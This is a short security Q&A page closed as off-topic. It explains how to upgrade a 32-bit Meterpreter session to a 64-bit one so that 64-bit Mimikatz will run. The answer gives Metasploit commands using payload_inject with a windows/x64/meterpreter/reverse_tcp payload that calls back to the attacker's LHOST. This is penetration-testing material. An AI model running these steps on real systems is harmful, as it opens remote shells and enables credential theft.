1

All the stagers that are sent seem to be 32 bit. This is fine, until I have to run Mimikatz which on a 64 bit system you NEED to run the 64 bit mimikatz. Since the 64 bit Mimikatz won't run on the 32 bit meterpreter, I'm in need of the 64 bit Meterpreter.

closed as off-topic by M'vy, schroeder, Mark, Eric G, Stephane Mar 10 '15 at 13:01

This question appears to be off-topic. The users who voted to close gave this specific reason:

  • "This question does not appear to be about Information security within the scope defined in the help center." – M'vy, schroeder, Mark, Stephane
If this question can be reworded to fit the rules in the help center, please edit the question.

3

Just use a 64 bit Meterpreter payload.

For example the windows/x64/meterpreter/reverse_tcp payload.
You can get a 64 bit shell from a 32 bit shell by using the payload_inject module built-in to Metasploit.

You can do this by running the following commands after you already have a 32 bit Meterpreter shell: use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
.

Then setting the other parameters (SESSION, LHOST, LPORT) to yours. Then you get a 64 bit Meterpreter shell!

Not the answer you're looking for? Browse other questions tagged or ask your own question.